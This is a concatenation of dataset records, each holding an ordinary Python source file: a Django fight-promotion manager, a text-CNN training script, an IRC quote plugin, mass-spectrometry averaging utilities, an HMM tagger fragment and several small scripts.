fighters.filter(fname__icontains=query)\r\n\r\n return render(request, 'ammamanager/promotions/bout.html', {\r\n 'event': event,\r\n 'bout' : bout,\r\n 'fighters' : fighters,\r\n 'rec' : recfighterstemp\r\n })\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef offer(request, pk, bout_pk, fighter_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n fighter = get_object_or_404(Fighter, pk=fighter_pk)\r\n\r\n if (bout.fighter1 == None):\r\n bout.fighter1 = fighter\r\n\r\n elif (bout.fighter2 == None):\r\n bout.fighter2 = fighter\r\n\r\n else:\r\n messages.success(request, 'There are no spaces left in the bout. Please remove a fighter')\r\n bout.save()\r\n\r\n return redirect('promotions:bout', event.pk, bout.pk)\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef removeFighters(request, pk, bout_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user)\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n\r\n bout.fighter1 = None\r\n\r\n bout.fighter2 = None\r\n\r\n bout.save()\r\n\r\n return redirect('promotions:bout', event.pk, bout.pk)\r\n\r\n@login_required\r\n@promotion_required\r\ndef offer_fight(request, pk, bout_pk, *args, **kwargs):\r\n\r\n event = get_object_or_404(Event, pk=pk, owner=request.user) #Doesnt seem right\r\n bout = get_object_or_404(Bout, pk=bout_pk, event=event)\r\n f1 = bout.fighter1\r\n f2 = bout.fighter2\r\n if f1 is not None and f2 is not None:\r\n offer1 = FightOffer(fighter = f1, opponent = f2, event = event, bout = bout)\r\n offer1.save()\r\n\r\n return redirect('promotions:event', event.pk)\r\n\r\n\r\n@login_required\r\n@promotion_required\r\ndef finished_bout(request, pk, bout_pk, fighter_pk):\r\n bout = get_object_or_404(Bout, pk=bout_pk)\r\n event = bout.event\r\n winner = get_object_or_404(Fighter, pk=fighter_pk)\r\n if bout.fighter1 == winner:\r\n loser = bout.fighter2\r\n else:\r\n loser = bout.fighter1\r\n\r\n if request.method == 'POST':\r\n form = FightForm(request.POST)\r\n if form.is_valid():\r\n fight = form.save(commit=False)\r\n if fight.method == 'Draw':\r\n return redirect('promotions:draw_bout', bout.event.pk, bout.pk)\r\n if fight.method == 'NC':\r\n return redirect('promotions:nc_bout', bout.event.pk, bout.pk)\r\n fight.bout = bout\r\n fight.winner = winner\r\n fight.loser = loser\r\n fight.event = event\r\n fight.save()\r\n fight.bout.completed = True\r\n fight.bout.save()\r\n\r\n winner.wins = winner.wins + 1\r\n loser.losses = loser.losses + 1\r\n winner.available = True\r\n loser.available = True\r\n winner.save()\r\n loser.save()\r\n set_fight_scores(fight.id)\r\n score_fighters()\r\n ranking(bout.weight)\r\n messages.success(request, 'Records Updated')\r\n return redirect('promotions:event', event.pk)\r\n else:\r\n form = FightForm()\r\n\r\n return render(request, 'ammamanager/promotions/bout_add_form.html', {'event': event, 'form': form})\r\n\r\n\r\ndef draw_bout(request, pk, bout_pk):\r\n bout = get_object_or_404(Bout, pk=bout_pk)\r\n fin = FinishedFight(bout=bout,event = bout.event, winner = bout.fighter1, loser = bout.fighter2, method = 'DRAW', round = 5, min = 5, sec = 0, winnerPoints = 0, loserPoints = 0)\r\n fin.winner.draws +=1\r\n fin.winner.available = True\r\n fin.loser.draws += 1\r\n fin.loser.available = True\r\n fin.winner.save()\r\n fin.loser.save()\r\n fin.save()\r\n bout.completed = True\r\n bout.save()\r\n return redirect('promotions:event', 
bout.event.pk)\r\n\r\n\r\ndef nc_bout(request, pk, bout_pk):\r\n    bout = get_object_or_404(Bout, pk=bout_pk)\r\n    fin = FinishedFight(bout=bout,event = bout.event, winner = bout.fighter1, loser = bout.fighter2, method = 'NC', round = 0, min = 0, sec = 0, winnerPoints = 0, loserPoints = 0)\r\n    fin.winner.nc += 1\r\n    fin.winner.available = True\r\n    fin.loser.nc += 1\r\n    fin.loser.available = True\r\n    fin.winner.save()\r\n    fin.loser.save()\r\n    fin.save()\r\n    bout.completed = True\r\n    bout.save()\r\n    return redirect('promotions:event', bout.event.pk)\r\n\r\ndef finish_event(request, pk):\r\n    event = get_object_or_404(Event, pk=pk)\r\n    offers = FightOffer.objects.all().filter(event=event)\r\n    event.finished = True\r\n    event.save()\r\n    for o in offers:\r\n        o.delete()\r\n\r\n    return redirect('promotions:event', event.pk)\r\n\r\n\r\ndef set_fight_scores(pk):\r\n    fin_bout = get_object_or_404(FinishedFight, pk=pk)\r\n    r1 = 10**(fin_bout.winner.points/400)\r\n    r2 = 10**(fin_bout.loser.points/400)\r\n    e1 = r1/(r1 + r2)\r\n    e2 = r2 / (r1 + r2)\r\n    w = 75 * (1 - e1)\r\n    l = 75 * (0 - e2)\r\n\r\n    if fin_bout.method != \"DEC\":  # string comparison; the original 'is not' tested identity and was almost always True\r\n        w = w * (1 +((6-fin_bout.round)/20))\r\n        l = l * (1 +((6-fin_bout.round)/20))\r\n\r\n    fin_bout.winnerPoints = w\r\n    fin_bout.loserPoints = l\r\n    fin_bout.save()\r\n    return 0\r\n\r\n\r\ndef score_fighters():\r\n    fighters = Fighter.objects.all()\r\n    for fighter in fighters:\r\n        points = fighter.initialPointsBoost\r\n        fights = FinishedFight.objects.all().filter(Q(winner=fighter) | Q(loser=fighter))\r\n        for fight in fights:\r\n            if fight.winner == fighter:\r\n                points += fight.winnerPoints\r\n            else:\r\n                points += fight.loserPoints\r\n        fighter.points = 1000 + points\r\n        fighter.save()\r\n    return 0\r\n\r\n\r\ndef ranking(weight):\r\n    fighters = Fighter.objects.all().filter(weight=weight).order_by('-points')\r\n    rank = 1\r\n\r\n    for x in fighters:\r\n        x.rank = rank\r\n        rank += 1\r\n        x.save()\r\n\r\n    return 0\r\n","sub_path":"ammamanager/views/promotions.py","file_name":"promotions.py","file_ext":"py","file_size_in_byte":13170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107989579","text":"# array of [value, probability] pairs\ndata = [[1, 0.2], [2, 0.4], [3, 0.3], [4, 0.1]]\n\ndef calc_expect(d):\n    expectation = 0\n    for x in d:\n        expectation += x[0] * x[1]\n    return expectation\n\ndef calc_disp(d):\n    expectation = calc_expect(d)\n    dispersion = 0\n    for x in d:\n        dispersion += ((x[0] - expectation) ** 2) * x[1]\n    return dispersion\n\nif __name__ == '__main__':\n    print(\"Data: \" + str(data))\n    print(\"Expectation: \" + str(calc_expect(data)))\n    print(\"Dispersion: \" + str(calc_disp(data)))\n","sub_path":"src/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"516576243","text":"\"\"\"\n\trocshelf v 0.1 ( Pre-Alpha )\n\tThe foundation of the core workflow and the development tooling has been laid.\n\"\"\"\n\nimport click\nfrom core import rocshelf as core\nfrom core import core_clear\n\n@click.group()\ndef cli():\n    pass\n\n@click.command()\n@click.option('--action', \t'-a', default = False, help='Action ( create / delete )')\n@click.option('--shelf', \t'-s', default = False, help='Type ( page , tag , basic ) ')\n@click.option('--name', \t'-n', default = False, help='Name')\ndef shelf(action, shelf, name):\n\tif not action:\texit('Specify an action with -a!')\n\tif not shelf:\texit('Specify an element type with -s!')\n\tif not 
name:\texit('Specify an element name with -n!')\n\tcore().shelf(shelf, name, action)\n\n@click.command()\ndef start():\n\tcore().start()\n\n@click.command()\ndef training():\n\tcore().training()\n\n@click.command()\ndef clear():\n\tcore_clear()\n\ncli.add_command(shelf)\ncli.add_command(start)\ncli.add_command(training)\ncli.add_command(clear)\n\nif __name__ == '__main__':\n    cli()\t","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"448404250","text":"# -*- coding: utf-8 -*-\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport numpy as np\n\nfrom gensim import corpora, models, similarities\nfrom collections import defaultdict\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Conv1D, MaxPooling1D, Dropout, Input, concatenate\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Model\n\nimport re\nimport joblib as jl\n\n# Number of classes\ngenre = 0\n# Maximum sequence length\nmaxLen = 30\n# Number of training epochs\nepochs = 500\n\n# Path to the input files\nfilepath = '../data/input_total/salary_question/'\nsavepath = './models/textCNN_model_salary_gensim.h5'\n\n# Words to ignore\n\n# Keep all stopwords (empty stoplist)\nstoplist = set(''.split())\n\n# Full version\n# stoplist = set('please for a of the and to in are can who one i was youre should than our had an after now us we under dont two five about other do didnt so were will does I like you with your , if did at on as be from that minute whats im . ? / ( ) [ ] | this would this yourself tell why which any have it is could when or me what here how'.split())\n\n# Simple version\n# stoplist = set('please for a of is be the and to in are can about other do were I like you your ? 
, .'.split())\n\n# Strip newline characters\ndef rm(text):\n\n\trm = re.compile(r'\\n')\n\treturn rm.sub('', text)\n\n# Read all files under the path\ndef readFile(path=filepath):\n\n\tglobal genre  # fix: the assignment below otherwise created a local and the module-level genre stayed 0\n\tall_texts = []\n\tall_labels = []\n\tfile_list = []\n\n\tfor file in os.listdir(path):\n\t\tfile_list.append(path + file)\n\n\tcounter_file = 0\n\tfor file_name in file_list:\n\t\twith open(file_name, encoding='utf-8') as f:\n\t\t\twhile 1:\n\t\t\t\tline = f.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tcounter_file += 1\n\t\t\t\t\tbreak\n\t\t\t\tall_texts.append(rm(\"\".join(line)))\n\t\t\t\tall_labels.append(counter_file)\n\n\tgenre = counter_file\n\t\n\treturn all_texts, all_labels\n\n# Preprocessing\ndef stringProcessing(documents):\n\n\tfrequency = defaultdict(int)\n\n\t# Walk every sentence and collect the words that are not in the stoplist\n\ttexts = [[word for word in document.lower().split() if word not in stoplist]\n\t\t\tfor document in documents]\n\n\t# Record word frequencies\n\tfor text in texts:\n\t\tfor token in text:\n\t\t\tfrequency[token] += 1\n\n\t# Keep only tokens that occur more than once\n\ttexts = [[token for token in text if frequency[token] > 1]\n\t\t\t for text in texts]\n\n\ttexts_concate = []\n\t#maxLenth = 0\n\tfor sentence in texts:\n\t\t# if(len(sentence) > maxLenth):\n\t\t# \tmaxLenth = len(sentence)\n\t\ttexts_concate.append(\" \".join(sentence))\n\n\twith open('./string/module/stoplist_salary', \"wb\") as handler:\n\t\tjl.dump(stoplist, handler)\n\n\twith open('./string/module/frequency_salary', \"wb\") as handler:\n\t\tjl.dump(frequency, handler)\n\n\treturn texts_concate\n\ndef preprocessing(train_texts, train_labels, test_texts, test_labels):\n\n\ttokenizer = Tokenizer(num_words=200)\n\ttokenizer.fit_on_texts(train_texts)\n\tx_train_seq = tokenizer.texts_to_sequences(train_texts)\n\tx_test_seq = tokenizer.texts_to_sequences(test_texts)\n\t# print(x_train_seq)\n\tx_train = sequence.pad_sequences(x_train_seq, maxlen=maxLen)\n\tx_test = sequence.pad_sequences(x_test_seq, maxlen=maxLen)\n\ty_train = np.array(train_labels)\n\ty_test = np.array(test_labels)\n\n\twith open(\"./models/tokenizer_salary\", \"wb\") as handler:\n\t\tjl.dump(tokenizer, handler)\n\n\treturn x_train, y_train, x_test, y_test\n\ndef stringProcessing_gensim(documents):\n\n\tfrequency = defaultdict(int)\n\n\t# Walk every sentence and collect the words that are not in the stoplist\n\ttexts = [[word for word in document.lower().split() if word not in stoplist]\n\t\t for document in documents]\n\n\t# Record word frequencies\n\tfor text in texts:\n\t\tfor token in text:\n\t\t\tfrequency[token] += 1\n\n\t# Keep only tokens that occur more than once\n\ttexts = [[token for token in text if frequency[token] > 1]\n\t\t\t for text in texts]\n\n\twith open('./string/module/frequency_salary', \"wb\") as handler:\n\t\tjl.dump(frequency, handler)\n\n\treturn texts\n\n# Turn documents into dense float vectors\ndef gensim_corpus(dictionary, texts):\n\n\tcorpus = [dictionary.doc2bow(text) for text in texts]\n\tcorpora.MmCorpus.serialize('./string/module/dictionary_salary.mm', corpus)\n\n\ttfidf = models.TfidfModel(corpus)\n\tcorpus_tfidf = tfidf[corpus]\n\n\t# initialize an LSI transformation\n\tlsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=maxLen) \n\tcorpus_lsi = lsi[corpus_tfidf]\n\n\tcorpus_vectors = [[vector[1] for vector in doc ] for doc in corpus_lsi]\n\n\treturn corpus_vectors\n\n# Build the training arrays\ndef preprocessing_gensim(train_texts, train_labels, test_texts, test_labels):\n\n\tdictionary = corpora.Dictionary(train_texts)\n\tdictionary.save('./string/module/dictionary_salary.dict')\n\n\tx_train_seq = gensim_corpus(dictionary, train_texts)\n\tx_test_seq = gensim_corpus(dictionary, test_texts)\n\n\t# Rescale the floats, otherwise padding would zero them out\n\tfor index_i in 
range(len(x_train_seq)):\n\t\tfor index_j in range(len(x_train_seq[index_i])):\n\t\t\tx_train_seq[index_i][index_j] *= 100\n\t\t\tx_train_seq[index_i][index_j] += 100\n\tfor index_i in range(len(x_test_seq)):\n\t\tfor index_j in range(len(x_test_seq[index_i])):\n\t\t\tx_test_seq[index_i][index_j] *= 100\n\t\t\tx_test_seq[index_i][index_j] += 100\t \n\t\n\tx_train = sequence.pad_sequences(x_train_seq, maxlen=maxLen)\n\tx_test = sequence.pad_sequences(x_test_seq, maxlen=maxLen)\n\n\ty_train = np.array(train_labels)\n\ty_test = np.array(test_labels)\n\n\treturn x_train, y_train, x_test, y_test\n\ndef text_cnn(maxlen=maxLen, max_features=200, embed_size=32):\n\n\tcomment_seq = Input(shape=[maxlen], name='x_seq')\n\temb_comment = Embedding(max_features, embed_size)(comment_seq)\n\n\tconvs = []\n\tfilter_sizes = [2, 3, 4, 5]\n\tfor fsz in filter_sizes:\n\t\tl_conv = Conv1D(filters=100, kernel_size=fsz, activation='relu')(emb_comment)\n\t\tl_pool = MaxPooling1D(maxlen - fsz + 1)(l_conv)\n\t\tl_pool = Flatten()(l_pool)\n\t\tconvs.append(l_pool)\n\tmerge = concatenate(convs, axis=1)\n\n\tout = Dropout(0.5)(merge)\n\toutput = Dense(32, activation='relu')(out)\n\toutput = Dense(units=genre, activation='softmax')(output)\n\t#output = Dense(units=3, activation='sigmoid')(output)\n\n\tmodel = Model([comment_seq], output)\n\t#model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\tmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\treturn model\n\ntrain_texts, train_labels = readFile()\ntest_texts, test_labels = readFile()\n\n# Feature extraction via gensim (LSI vectors)\ntrain_texts = stringProcessing_gensim(train_texts)\ntest_texts = stringProcessing_gensim(test_texts)\n\nx_train, y_train, x_test, y_test = preprocessing_gensim(train_texts, train_labels, test_texts, test_labels)\n\n# Plain tokenizer pipeline (non-gensim), kept for reference\n# train_texts = stringProcessing(train_texts)\n# test_texts = stringProcessing(test_texts)\n\n# x_train, y_train, x_test, y_test = preprocessing(train_texts, train_labels, test_texts, test_labels)\n\n# print(x_train, x_test)\n\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nmodel = text_cnn()\n\nmodel.fit(x_train, y_train,\n\t\t\tvalidation_split=0.1,\n\t\t\tbatch_size=128,\n\t\t\tepochs=epochs,\n\t\t\tshuffle=True)\n\nscores = model.evaluate(x_train, y_train)\nprint(scores)\n\n# Save the model\nmodel.save(savepath)\n","sub_path":"tensorflow/scripts/demo/scripts/textCNN_gensim.py","file_name":"textCNN_gensim.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"654215636","text":"class Solution:\n    def maxProfit(self, prices):\n        \"\"\"\n        :type prices: List[int]\n        :rtype: int\n        \"\"\"\n        '''\n        Greedy strategy: take every positive day-to-day price difference\n        '''\n        res = 0\n        for i in range(len(prices) - 1):\n            if prices[i] < prices[i + 1]:\n                res += prices[i + 1] - prices[i]\n        return res\n\n\nif __name__ == '__main__':\n    # s = Solution()\n    # prices = [1, 2, 3, 4, 5]\n    # print(s.maxProfit(prices))\n    print('\\n'.join([''.join([('Love'[(x - y) % len('Love')] if ((x * 0.05) ** 2 + (y * 0.1) ** 2 - 1) ** 3 - (\n            x * 0.05) ** 2 * (y * 0.1) ** 3 <= 0 else ' ') for x in range(-30, 30)]) for y in range(30, -30, -1)]))\n","sub_path":"maxProfit.py","file_name":"maxProfit.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"50006220","text":"import time\nimport random\nimport sqlite3\nimport datetime\n\nfrom 
aqbot.lib.plugins.plugin import PluginObject\n\n__all__ = [\"QuotePlugin\"]\n\n\nclass QuotePlugin(PluginObject):\n    filename = 'db/quotes.db'\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    def setup(self):\n        conn = sqlite3.connect(self.filename)\n        c = conn.cursor()\n        c.execute('''CREATE TABLE IF NOT EXISTS quotes(\n            id INTEGER PRIMARY KEY,\n            user TEXT,\n            quote TEXT,\n            date TEXT)''')\n        conn.commit()\n        conn.close()\n\n        self.command_manager.add(self, self.quote_cmd, \"!q\", [\"!quote\"])\n\n    def quote_cmd(self, listener, sender, target, args):\n        arg_list = args.split()\n\n        db = sqlite3.connect(self.filename)\n        c = db.cursor()\n\n        if len(arg_list) < 1:\n            c.execute(\"SELECT user,quote,date FROM quotes\")\n            rows = c.fetchall()\n\n            q = random.choice(rows)\n            stamp = datetime.datetime.fromtimestamp(int(q[2])).strftime('%Y-%m-%d')\n            self.messenger.msg(target, \"\\\"%s\\\" -%s, %s\" % (q[1], q[0], stamp))\n            return\n\n        if len(arg_list) > 1 and arg_list[0].lower() == \"add\":\n            user = arg_list[1]\n            trimlen = len(user)+5\n            c.execute('INSERT INTO quotes VALUES (NULL,?,?,?)', (user, args[trimlen:], str(time.time())))\n            db.commit()\n            self.messenger.msg(target, \"Added!\")\n            return\n\n        user = arg_list[0]\n        c.execute(\"SELECT user,quote,date FROM quotes WHERE user = ?\", (user,))  # bind parameters must be a sequence, not a bare string\n        rows = c.fetchall()\n        if not rows:\n            self.messenger.msg(target, \"No quotes for %s found.\" % user)\n            return\n\n        q = random.choice(rows)\n        stamp = datetime.datetime.fromtimestamp(int(q[2])).strftime('%Y-%m-%d')\n        self.messenger.msg(target, \"\\\"%s\\\" -%s, %s\" % (q[1], user, stamp))\n","sub_path":"aqbot/plugins/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"423327201","text":"#!/usr/bin/env python\n\n\"\"\"\nA variety of push utility functions\n\"\"\"\n\nfrom pylib.util.git_util import GitUtil\n\n__author__ = 'edelman@room77.com (Nicholas Edelman)'\n__copyright__ = 'Copyright 2013 Room77, Inc.'\n\n\nclass PushUtil(object):\n  @classmethod\n  def get_deployspec_name(cls, cluster_name):\n    \"\"\"given a cluster returns the deployspec name\n    convention of $cluster-$current_branchname.\n    Args:\n      cluster - the cluster name\n    Returns:\n      the deployspec name for the current branch and cluster\n    \"\"\"\n    return '%s-%s' % (cluster_name, GitUtil.get_current_branch())\n","sub_path":"pylib/mps/util/push_util.py","file_name":"push_util.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"186469678","text":"#!/usr/bin/env python3\n\nimport PWMmay as PWM\n\nchannel = \"P9_14\"\n\n# print(PWM.get_pwm_key(channel))\n\n# print(PWM.get_pwm_path(channel))\n\nerr = PWM.start(channel, 50, freq=1000)\nif err is None:\n    exit()\n\nprint(PWM.set_frequency(channel, 10000))\n\nprint(PWM.set_duty_cycle(channel, 10))\n\n# print(PWM.stop(channel))","sub_path":"python/PWMtest.py","file_name":"PWMtest.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"507417162","text":"import math\nfrom collections import defaultdict\n\nimport numpy as np\n\nfrom ms_peak_picker import search\nfrom ms_peak_picker.utils import peaklist_to_profile\n\n\ndef average_profile_scans(scan_arrays, width=0.01):\n    groups = [[arr.astype(float) for arr in group] for group in scan_arrays]\n\n    mzs = set()\n    for mz_array, intensity_array in 
groups:\n mzs.update(mz_array)\n\n mzs = sorted(mzs)\n mz_out = []\n intensity_out = []\n\n _abs = abs\n _len = len\n\n for mz in mzs:\n cluster_mzs = []\n cluster_intensities = []\n for group in groups:\n mz_array, intensity_array = group\n left_ix = search.get_nearest(mz_array, mz - width, 0)\n left_mz = mz_array[left_ix]\n err = (left_mz - (mz - width))\n abs_err = _abs(err)\n if abs_err > width:\n if err > 0 and left_ix != 0:\n left_ix -= 1\n elif left_ix != _len(mz_array) - 1:\n left_ix += 1\n\n left_mz = mz_array[left_ix]\n err = (left_mz - (mz - width))\n if _abs(err) > (2 * width):\n continue\n\n right_ix = search.get_nearest(mz_array, mz + width, 0)\n right_mz = mz_array[right_ix]\n err = (right_mz - (mz + width))\n abs_err = _abs(err)\n if abs_err > width:\n if err > 0:\n right_ix -= 1\n elif right_ix != _len(mz_array) - 1:\n right_ix += 1\n\n right_mz = mz_array[right_ix]\n err = (right_mz - (mz + width))\n abs_err = _abs(err)\n if abs_err > (2 * width):\n continue\n\n mz_values = mz_array[left_ix:(right_ix + 1)]\n intensity_values = intensity_array[left_ix:(right_ix + 1)]\n\n cluster_mzs.extend(mz_values)\n cluster_intensities.extend(intensity_values)\n\n cluster_mzs = np.array(cluster_mzs)\n cluster_intensities = np.array(cluster_intensities)\n ix = np.argsort(cluster_mzs)\n cluster_mzs = cluster_mzs[ix]\n cluster_intensities = cluster_intensities[ix]\n\n u = np.mean(cluster_mzs)\n sd = np.std(cluster_mzs)\n gauss_weights = np.exp(-((cluster_mzs - u) ** 2) / (2 * (sd ** 2)))\n intensity = (gauss_weights * cluster_intensities).sum() / \\\n gauss_weights.sum()\n mz_out.append(mz)\n intensity_out.append(intensity)\n return np.array(mz_out, dtype=np.float64), np.array(intensity_out, dtype=np.float64)\n\n\ndef peak_set_similarity(peak_set_a, peak_set_b, precision=0):\n \"\"\"Computes the cosine distance between two peak sets, a similarity metric\n ranging between 0 (dissimilar) to 1.0 (similar).\n\n Parameters\n ----------\n peak_set_a : Iterable of Peak-like\n peak_set_b : Iterable of Peak-like\n The two peak collections to compare. It is usually only useful to\n compare the similarity of peaks of the same class, so the types\n of the elements of `peak_set_a` and `peak_set_b` should match.\n precision : int, optional\n The precision of rounding to use when binning spectra. Defaults to 0\n\n Returns\n -------\n float\n The similarity between peak_set_a and peak_set_b. 
Between 0.0 and 1.0\n \"\"\"\n bin_a = defaultdict(float)\n bin_b = defaultdict(float)\n\n positions = set()\n\n for peak in peak_set_a:\n mz = round(peak.mz, precision)\n bin_a[mz] += peak.intensity\n positions.add(mz)\n\n for peak in peak_set_b:\n mz = round(peak.mz, precision)\n bin_b[mz] += peak.intensity\n positions.add(mz)\n\n z = 0\n n_a = 0\n n_b = 0\n\n for mz in positions:\n a = bin_a[mz]\n b = bin_b[mz]\n z += a * b\n n_a += a ** 2\n n_b += b ** 2\n\n n_ab = math.sqrt(n_a) * math.sqrt(n_b)\n if n_ab == 0.0:\n return 0.0\n else:\n return z / n_ab\n\n\ndef average_peak_lists(peak_lists, width=0.01):\n scan_arrays = map(peaklist_to_profile, peak_lists)\n return average_profile_scans(scan_arrays, width=width)\n","sub_path":"ms_peak_picker/scan_averaging.py","file_name":"scan_averaging.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"528991431","text":"\nimport pprint \nimport itertools\n\nclass Word:\n\n\tdef __init__(self,syntax,tag):\n\t\tself.syntax = syntax\n\t\tself.tag = tag\n\nclass Sentence:\n\t\n\tdef __init__(self,*words):\n\t\tself.words = list(words)\n\t\tpass\n\t\n\tdef getTagSequenceNPrev(self,*words):\n\t\tself.tambah(words)\n\t\tpass\n\t\n\tdef getFirstWord(self,):\n\t\treturn words[0]\n\t\n\tdef tambah(self,*words):\n\t\tfor word in words:\n\t\t\tself.words.append(word)\n\t\n\tdef getSentence(self):\n\t\tresult =\"\"\n\t\tfor word in self.words:\n\t\t\tresult += word.syntax+\"/\"+word.tag+\" \"\n\t\t\t# result += word.tag+\" \"\n\t\treturn result\n\n\tdef countStartingTransitionInSentence(self,condition_tags,next_tag):\n\t\tsequence = [ x for x in condition_tags if x != 's']\n\t\tif next_tag != \"*\":\n\t\t\tsequence.append(next_tag)\n\t\tfor ii in list(range(0,len(sequence))):\n\t\t\tif self.words[ii].tag != sequence[ii]:\n\t\t\t\treturn 0\n\t\treturn 1\n\n\t\"\"\" menghitung P(next_tag | condition_tags) berupa array (ngram)\"\"\"\n\tdef countTransitionInSentence(self,condition_tags,next_tag):\n\t\tresult = 0\n\t\tsequence = condition_tags[:]\n\t\tsequence.append(next_tag)\n\t\tfor idx,word in enumerate(self.words):\n\t\t\tmatching=True;\n\t\t\tif idx+len(sequence) > len(self.words):\n\t\t\t\tbreak;\n\t\t\tfor seq_idx,seqItem in enumerate(sequence):\n\t\t\t\tmatching = matching and ((self.words[idx+seq_idx].tag==sequence[seq_idx]) or sequence[seq_idx]=='*') #kalo bintang match semua tag\n\t\t\tif matching:\n\t\t\t\tresult += 1\n\t\treturn result\n\n\tdef countTagInSentence(self,target_tag,word_filter=None):\n\t\tresult = 0\n\t\tfor word in self.words:\n\t\t\tif word_filter == None:\n\t\t\t\tcountCondition = word.tag == target_tag\n\t\t\telse:\n\t\t\t\tcountCondition = word.tag == target_tag and word.syntax == word_filter\n\t\t\tif countCondition :\n\t\t\t\tresult+=1\n\t\treturn result\n\nclass HMM_Model:\n\n\tdef __init__(self, *sentences):\n\t\tself.sentences = list(sentences)\n\t\tself.uniqueTags = set([])\n\t\tself.uniqueWords = set([])\n\t\tself.reloadUniqueTagsNWords() # mengisi uniqueTag\n\t\tpass\n\n\tdef smoothing(self,emissionTable):\n\t\tNOMINATOR = 0\n\t\tDENOMINATOR = 1\n\t\tnew_denom = 0.0;\n\t\tfor tag in emissionTable:\n\t\t\tnew_denom = 0.0\n\t\t\tfor word in emissionTable[tag]:\n\t\t\t\tnew_denom += emissionTable[tag][word][NOMINATOR]+1\n\t\t\tfor word in emissionTable[tag]:\n\t\t\t\temissionTable[tag][word] = (emissionTable[tag][word][NOMINATOR]+1,new_denom)\n\t\t\t\t# emissionTable[tag][word][DENOMINATOR] = new_denom \n\t\treturn 
emissionTable\n\n\tdef generateStartingTransitionTable(self,ngram):\n\t\tngram = ngram-1\n\t\ttransitionTable = {}\n\t\tstartingUniqueTags = ['s'] + list(self.uniqueTags)\n\t\tall_current_tag = self.getPermute(startingUniqueTags,ngram)\n\t\tall_current_tag = [x for x in all_current_tag if x[0]=='s'] # ambil hanya permutasi yang depannya \n\t\tfor current_tag in all_current_tag:\n\t\t\tstartingTransitionRow = {}\n\t\t\tfor next_tag in self.uniqueTags:\n\t\t\t\tstartingTransitionRow[next_tag] = self.calculateStartingTransitionProb(list(current_tag),next_tag)\n\t\t\ttransitionTable[current_tag]=startingTransitionRow\n\t\treturn transitionTable\n\n\tdef generateTransitionTable(self,ngram):\n\t\tngram = ngram-1\n\t\ttransitionTable = {}\n\t\tall_current_tag = self.getPermute(self.uniqueTags,ngram)\n\t\tfor current_tag in all_current_tag:\n\t\t\ttransitionRow = {}\n\t\t\tfor next_tag in self.uniqueTags:\n\t\t\t\ttransitionRow[next_tag] = self.calculateTransitionProb(list(current_tag),next_tag)\n\t\t\ttransitionTable[current_tag]=transitionRow\n\t\treturn transitionTable\n\n\tdef generateEmissionTable(self):\n\t\temissionTable = {}\n\t\tfor tag in self.uniqueTags:\n\t\t\temissionRow = {}\n\t\t\tfor word in self.uniqueWords:\n\t\t\t\temissionRow[word]=self.calculateEmissionProb(word,tag)\n\t\t\temissionTable[tag]=emissionRow\n\t\treturn emissionTable\n\n\t\"\"\" menghitung P(next_tag|current_tag) \"\"\"\n\tdef calculateStartingTransitionProb(self,condition_tags,next_tag):\n\t\tdenominator = self.countStartingTransitionFromAll(condition_tags,\"*\")\n\t\tif denominator == 0 :\n\t\t\t# print \"error divided by zero\"\n\t\t\treturn (0,0)\n\n\t\treturn (float(self.countStartingTransitionFromAll(condition_tags,next_tag)) , denominator)\n\n\t\"\"\" menghitung P(next_tag|current_tag) \"\"\"\n\tdef calculateTransitionProb(self,condition_tags,next_tag):\n\t\tdenominator = self.countTransitionFromAll(condition_tags,\"*\")\n\t\tif denominator == 0 :\n\t\t\t# print \"error divided by zero\"\n\t\t\treturn (0,0)\n\n\t\treturn (float(self.countTransitionFromAll(condition_tags,next_tag)) , denominator)\n\n\t\"\"\" menghitung P(word_syntax|tag) \"\"\"\n\tdef calculateEmissionProb(self,word_syntax,tag):\n\t\tdenominator = self.countTagFromAll(tag)\n\t\tif denominator == 0 :\n\t\t\tprint(\"error divided by zero\")\n\t\t\treturn 0;\n\t\treturn (float(self.countTagFromAll(tag,word_syntax)),denominator)\n\n\tdef countStartingTransitionFromAll(self,condition_tags,next_tag):\n\t\tresult = 0 \n\t\tfor sentence in self.sentences:\n\t\t\tresult += sentence.countStartingTransitionInSentence(condition_tags,next_tag)\n\t\treturn result\n\n\tdef 